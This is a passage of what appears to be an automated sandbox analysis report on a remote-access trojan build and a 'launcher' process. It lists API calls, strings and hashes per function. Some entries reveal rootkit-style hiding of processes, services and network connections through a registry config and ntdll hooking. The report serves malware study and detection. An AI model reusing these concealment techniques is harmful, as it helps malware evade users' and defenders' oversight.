}, xrefs: 0008B4D6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 70ecb4b5844618f1c38d0ea0c6111f0e0435e22507ecaac4f015254fb0c82a6d
Instruction ID: 102faf0531d64ca14e4c674381c59e44655703aef230428fa8de6a1972673c3b
Opcode Fuzzy Hash: 70ecb4b5844618f1c38d0ea0c6111f0e0435e22507ecaac4f015254fb0c82a6d
Instruction Fuzzy Hash: 2021F37290470A5ADB31FA64D845FABB7DCEF81754F14042AF5C0C3242EB65DE4883A2

Function 0007F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0007F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0007F2E4
Part of subcall function 0007F2C5: GetProcAddress.KERNEL32(000B81C8,CryptUnprotectMemory), ref: 0007F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0007F33E), ref: 0007F3D2

Strings

CryptUnprotectMemory failed, xrefs: 0007F3CA
CryptProtectMemory failed, xrefs: 0007F389

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: a56f0451f88e8b4164c5e9b594ceb6783ba64a3ff3df7707bfb2130b6e5508f0
Instruction ID: 9d3aafda55e5927c44ab2da85554839f502812f8a71744d493a6b6d8478d9da0
Opcode Fuzzy Hash: a56f0451f88e8b4164c5e9b594ceb6783ba64a3ff3df7707bfb2130b6e5508f0
Instruction Fuzzy Hash: C1110631E0162A6BEF115F34DC45ABE3798EF01760B00C126FC495B252DA7C9F018799

Function 0007C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0007C080

Strings

?*<>|", xrefs: 0007C06D, 0007C07F
<9, xrefs: 0007C076

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcschr
String ID: <9$?*<>|"
API String ID: 2691759472-89786190
Opcode ID: 6ece6266f1571fbf30388a998a36fed11b9e71a1e76c2a1cde48337f88109250
Instruction ID: 69216101b0aa4e09d9486888754ab085d265634f53d2c27dcee77ba05e71fe99
Opcode Fuzzy Hash: 6ece6266f1571fbf30388a998a36fed11b9e71a1e76c2a1cde48337f88109250
Instruction Fuzzy Hash: 07F0D153E44701D1E7301F289801B77B3E4EFA2320F34881EE4CC872C2E6A998C092E9

Function 0009BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000997E5: GetLastError.KERNEL32(?,000B1098,00094674,000B1098,?,?,000940EF,?,?,000B1098), ref: 000997E9
Part of subcall function 000997E5: _free.LIBCMT ref: 0009981C
Part of subcall function 000997E5: SetLastError.KERNEL32(00000000,?,000B1098), ref: 0009985D
Part of subcall function 000997E5: _abort.LIBCMT ref: 00099863

_abort.LIBCMT ref: 0009BB80
_free.LIBCMT ref: 0009BBB4

Strings

p, xrefs: 0009BBAB

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p
API String ID: 289325740-3461400186
Opcode ID: d1c88abe0b276f879c1833118b35700dbf415de982dd0627495e8c53be0e38a4
Instruction ID: 161317710f9b1bd2904901e71d862f3cad2320b8510e0056f622e2a9c6ba11b8
Opcode Fuzzy Hash: d1c88abe0b276f879c1833118b35700dbf415de982dd0627495e8c53be0e38a4
Instruction Fuzzy Hash: 3F01C031D01A369BCF61AFA8E5016ADB7B0BF09B30B15010AE964672D6CFB46D01AFC1

Function 00071316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0007E2E8: _swprintf.LIBCMT ref: 0007E30E
Part of subcall function 0007E2E8: _strlen.LIBCMT ref: 0007E32F
Part of subcall function 0007E2E8: SetDlgItemTextW.USER32(?,000AE274,?), ref: 0007E38F
Part of subcall function 0007E2E8: GetWindowRect.USER32(?,?), ref: 0007E3C9
Part of subcall function 0007E2E8: GetClientRect.USER32(?,?), ref: 0007E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0007135A
SetWindowTextW.USER32(00000000,000A35F4), ref: 00071370

Strings

0, xrefs: 00071319

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: ccc2f97015ca9355d3058c159a8746f64d7b973aeed299b2c53e7bdaba16f24f
Instruction ID: 460808801e36195880899fc02928d33163dfd10dca4cde5bc4fde28a3fb4e796
Opcode Fuzzy Hash: ccc2f97015ca9355d3058c159a8746f64d7b973aeed299b2c53e7bdaba16f24f
Instruction Fuzzy Hash: A9F0AF30905289AAEF551F68CC0EBEA3BB8AF44344F04C116FC4C545E2CB7CCA90EA38

Function 00080FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00081101,?,?,0008117F,?,?,?,?,?,00081169), ref: 00080FEA
GetLastError.KERNEL32(?,?,0008117F,?,?,?,?,?,00081169), ref: 00080FF6

Part of subcall function 00076C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00076C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00080FFF

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: ff1108a3db589eb7ceb5ce0ff3d74e0cf08ce3a0dbe5435944cf9ef75de23657
Instruction ID: d29b4a1534ac80509d9d86a9d0469d62c2272ec5e42cbe58756282dbd124c654
Opcode Fuzzy Hash: ff1108a3db589eb7ceb5ce0ff3d74e0cf08ce3a0dbe5435944cf9ef75de23657
Instruction Fuzzy Hash: A1D02B3290892036D61133249C15DFF38049F23331B608704F13E642E3CA9D09814697

Function 0007E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0007DA55,?), ref: 0007E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0007DA55,?), ref: 0007E2B1

Strings

RTL, xrefs: 0007E2AB

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: f0982b6bf817739f61df7850d4637ee01ba5e17dc1d77eb236065d0da16c553e
Instruction ID: c94ab14e5f142a5535c4cee2511be40e0fb1006d11c96bb2683ec175eb1690ce
Opcode Fuzzy Hash: f0982b6bf817739f61df7850d4637ee01ba5e17dc1d77eb236065d0da16c553e
Instruction Fuzzy Hash: 25C01231641B5066F63017746C1EF437A585B12B11F050448B245E91D1D6A9C54186A0

Analysis Process: launcher.exePID: 6848, Parent PID: 6688COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	89.1%
Signature Coverage:	10.9%
Total number of Nodes:	137
Total number of Limit Nodes:	18

Executed Functions

Function 000001EDF1662CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001EDF1662D80
lstrlenW.KERNEL32 ref: 000001EDF1662FBA

Part of subcall function 000001EDF1661A14: OpenProcess.KERNEL32 ref: 000001EDF1661A3A
Part of subcall function 000001EDF1661A14: K32GetModuleFileNameExW.KERNEL32 ref: 000001EDF1661A58
Part of subcall function 000001EDF1661A14: PathFindFileNameW.SHLWAPI ref: 000001EDF1661A67
Part of subcall function 000001EDF1661A14: lstrlenW.KERNEL32 ref: 000001EDF1661A73
Part of subcall function 000001EDF1661A14: StrCpyW.SHLWAPI ref: 000001EDF1661A86
Part of subcall function 000001EDF1661A14: CloseHandle.KERNEL32 ref: 000001EDF1661A94

GetProcAddress.KERNEL32 ref: 000001EDF1662D95

Part of subcall function 000001EDF1661554: StrCmpIW.SHLWAPI ref: 000001EDF1661585

Part of subcall function 000001EDF1663930: StrCmpNIW.SHLWAPI ref: 000001EDF1663948

StrCmpNIW.SHLWAPI ref: 000001EDF1662DD8
lstrlenW.KERNEL32 ref: 000001EDF1662F00

Strings

\Device\Nsi, xrefs: 000001EDF1662DCB
NtQueryObject, xrefs: 000001EDF1662D8B
ntdll.dll, xrefs: 000001EDF1662D79

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 6645e98c4c348eea25a5a0a6ec2c48fd3d0d6a93992ea38237dde67cf004b342
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 03B15A72210AD082EB64CF39E5407ED73E4F786B88F54502AEE4A5BB97DE35C986C340

Function 000001EDF1662A7C Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e10426e681e7f6cf899e4393c9bf8be204e3db0faa1dd7183fda82dc324521
Instruction ID: 7b157bcecd9fa1d461ad37c946fed4d10a1bf4bebd80d2697d90bdd01c6bf916
Opcode Fuzzy Hash: f0e10426e681e7f6cf899e4393c9bf8be204e3db0faa1dd7183fda82dc324521
Instruction Fuzzy Hash: A4117F3620479482E761DF26F84065EB3E4F39AB9CF50412DEE8A87756EF34C886C780

Function 000001EDF1661650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001EDF166165B
HeapAlloc.KERNEL32 ref: 000001EDF166166A

Part of subcall function 000001EDF1661274: GetProcessHeap.KERNEL32 ref: 000001EDF166127A
Part of subcall function 000001EDF1661274: HeapAlloc.KERNEL32 ref: 000001EDF1661289
Part of subcall function 000001EDF1661274: GetProcessHeap.KERNEL32 ref: 000001EDF16612A3
Part of subcall function 000001EDF1661274: HeapAlloc.KERNEL32 ref: 000001EDF16612B4

RegOpenKeyExW.ADVAPI32 ref: 000001EDF16616DA
RegOpenKeyExW.ADVAPI32 ref: 000001EDF1661707
RegCloseKey.ADVAPI32 ref: 000001EDF1661721
RegOpenKeyExW.ADVAPI32 ref: 000001EDF1661741
RegCloseKey.ADVAPI32 ref: 000001EDF166175C
RegOpenKeyExW.ADVAPI32 ref: 000001EDF166177C
RegCloseKey.ADVAPI32 ref: 000001EDF1661797
RegOpenKeyExW.ADVAPI32 ref: 000001EDF16617B7
RegCloseKey.ADVAPI32 ref: 000001EDF16617D2
RegOpenKeyExW.ADVAPI32 ref: 000001EDF16617F2
RegCloseKey.ADVAPI32 ref: 000001EDF166180D
RegOpenKeyExW.ADVAPI32 ref: 000001EDF166182D
RegCloseKey.ADVAPI32 ref: 000001EDF1661848
RegOpenKeyExW.ADVAPI32 ref: 000001EDF1661868
RegCloseKey.ADVAPI32 ref: 000001EDF1661883
RegOpenKeyExW.ADVAPI32 ref: 000001EDF16618A3
RegCloseKey.ADVAPI32 ref: 000001EDF16618BE
RegCloseKey.ADVAPI32 ref: 000001EDF16618C8

Part of subcall function 000001EDF16612C8: RegQueryInfoKeyW.ADVAPI32 ref: 000001EDF1661326
Part of subcall function 000001EDF16612C8: GetProcessHeap.KERNEL32 ref: 000001EDF1661334
Part of subcall function 000001EDF16612C8: HeapAlloc.KERNEL32 ref: 000001EDF1661345
Part of subcall function 000001EDF16612C8: RegEnumValueW.ADVAPI32 ref: 000001EDF16613A1
Part of subcall function 000001EDF16612C8: GetProcessHeap.KERNEL32 ref: 000001EDF16613E9
Part of subcall function 000001EDF16612C8: HeapAlloc.KERNEL32 ref: 000001EDF16613F7
Part of subcall function 000001EDF16612C8: GetProcessHeap.KERNEL32 ref: 000001EDF166141B
Part of subcall function 000001EDF16612C8: HeapFree.KERNEL32 ref: 000001EDF1661429
Part of subcall function 000001EDF16612C8: lstrlenW.KERNEL32 ref: 000001EDF1661432
Part of subcall function 000001EDF16612C8: GetProcessHeap.KERNEL32 ref: 000001EDF1661440
Part of subcall function 000001EDF16612C8: HeapAlloc.KERNEL32 ref: 000001EDF166144E

Strings

process_names, xrefs: 000001EDF1661775
service_names, xrefs: 000001EDF16617EB
tcp_remote, xrefs: 000001EDF1661861
startup, xrefs: 000001EDF16616FD
udp, xrefs: 000001EDF166189C
pid, xrefs: 000001EDF166173A
tcp_local, xrefs: 000001EDF1661826
paths, xrefs: 000001EDF16617B0
SOFTWARE\dialerconfig, xrefs: 000001EDF16616BA

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: b76c501fb318e59eca5a54e4ca50f7592ea82b6a85f791d9ce8cf833c2d0e14a
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: EB71D776710A9086EB10DF76F8906DD27E4FB8AB88F415211DE4E57A6BDF38C446C740

Function 000001EDF1665C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EDF1665C4B
GetThreadContext.KERNEL32 ref: 000001EDF1665DB5

Part of subcall function 000001EDF1665A40: GetCurrentThreadId.KERNEL32 ref: 000001EDF1665A44

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: d8e9435e92dba28f12f6f3d3e015c2cf867da3c8eee2266169f1663f505a57da
Instruction ID: ec37f8e32a58558ae1abc4a260714f09d1ebef2026c2fd4e4f462bc24f456607
Opcode Fuzzy Hash: d8e9435e92dba28f12f6f3d3e015c2cf867da3c8eee2266169f1663f505a57da
Instruction Fuzzy Hash: 23D16A76209B8885DA60DB1AF49539E77E0F7C9B84F104616EE8E47BA6DF39C542CF00

Function 000001EDF16651B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EDF1665236

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 8cbbc977435add57f842a8b021d8bf7d85f171c4fe5f6a5014daddc4a4f41314
Instruction ID: 876fec17bc91ca1dc0d3e8fe327c6ecc0ef7759876f0003de5a031f1ac829c9c
Opcode Fuzzy Hash: 8cbbc977435add57f842a8b021d8bf7d85f171c4fe5f6a5014daddc4a4f41314
Instruction Fuzzy Hash: AD028436219BC486E760DB65F49539EB7A0F3C6B94F104115EA8E87BAADF78C485CF00

Function 000001EDF1663878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000001EDF1663886
GetCurrentProcess.KERNEL32 ref: 000001EDF16638B4
VirtualProtectEx.KERNEL32 ref: 000001EDF16638D6
GetCurrentProcess.KERNEL32 ref: 000001EDF16638F4
VirtualProtectEx.KERNEL32 ref: 000001EDF1663915

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: af472da82e1936ec1042aebbe6cf33ba01f7e5b71d6cfe873542126869b0820b
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 4A112A3A714B8082EB15DB31F4146AD67B0F78AB84F040129DE8E0B796EE3DC506C700

Function 00007FF77E088A15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF77E081070: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E081094
Part of subcall function 00007FF77E081070: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E0810B5

system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF77E088D29

Strings

Shika cannot start in archive!Please extract Shika to a folder!, xrefs: 00007FF77E088A1A
pause, xrefs: 00007FF77E088D22

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintfsystem
String ID: Shika cannot start in archive!Please extract Shika to a folder!$pause
API String ID: 498820738-1288724464
Opcode ID: 03e864864a22d95a6f7657763fda09347f14319991748fb8647a21e8d0f06fc8
Instruction ID: 154c01e5725da8f3575b1dc2bd6d5cee54ce24115c6deb412f5c7bd34f367261
Opcode Fuzzy Hash: 03e864864a22d95a6f7657763fda09347f14319991748fb8647a21e8d0f06fc8
Instruction Fuzzy Hash: E4F0AF27A3868284EA50EB14E8552FDA322EB44794FE01032CE0D03A55DF3CF982C760

Function 00007FF77E088B48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF77E081070: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E081094
Part of subcall function 00007FF77E081070: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF77E0810B5

system.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00007FF77E088D29

Strings

Shika cannot start in any folder that is stored on OneDrive!Please move Shika to any local folder!, xrefs: 00007FF77E088B51
pause, xrefs: 00007FF77E088D22

Memory Dump Source

Source File: 00000006.00000002.3729904812.00007FF77E081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF77E080000, based on PE: true

Associated: 00000006.00000002.3729664833.00007FF77E080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3730975436.00007FF77E0AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3731351405.00007FF77E0B0000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff77e080000_launcher.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintfsystem
String ID: Shika cannot start in any folder that is stored on OneDrive!Please move Shika to any local folder!$pause
API String ID: 498820738-77646289
Opcode ID: 44994c8cbea2b2663c4f396765317704006f1d28da1e6d6ac4315167a688e3df
Instruction ID: 6c7cf763d5e0a13e6a0238a8e9a5fb1be8c44e3b7e8b2885defdc735fe763ad2
Opcode Fuzzy Hash: 44994c8cbea2b2663c4f396765317704006f1d28da1e6d6ac4315167a688e3df
Instruction Fuzzy Hash: D9F08C27A3868285EA50EB14E8552FDA322EB84794FE41032CE0D43655CF3CF982C760

Function 000001EDF1663AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001EDF1663B46
VirtualAlloc.KERNEL32 ref: 000001EDF1663B80

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: ac39143bcba8d2f385f3c773a314eea795a34c62483c8af37edc63cfc36c0ca2
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 2831BF32619AC481EA71DB35F05439E62E4F399784F100525AACF4AB9BDF7DC5528B04

Function 000001EDF1663458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001EDF166347A
PathFindFileNameW.SHLWAPI ref: 000001EDF1663489

Part of subcall function 000001EDF1663930: StrCmpNIW.SHLWAPI ref: 000001EDF1663948

Part of subcall function 000001EDF1663878: GetModuleHandleW.KERNEL32 ref: 000001EDF1663886
Part of subcall function 000001EDF1663878: GetCurrentProcess.KERNEL32 ref: 000001EDF16638B4
Part of subcall function 000001EDF1663878: VirtualProtectEx.KERNEL32 ref: 000001EDF16638D6
Part of subcall function 000001EDF1663878: GetCurrentProcess.KERNEL32 ref: 000001EDF16638F4
Part of subcall function 000001EDF1663878: VirtualProtectEx.KERNEL32 ref: 000001EDF1663915

CreateThread.KERNEL32 ref: 000001EDF16634D7

Part of subcall function 000001EDF1661EB4: GetCurrentThread.KERNEL32 ref: 000001EDF1661EBF

Memory Dump Source

Source File: 00000006.00000002.3728761881.000001EDF1660000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001EDF1660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1edf1660000_launcher.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
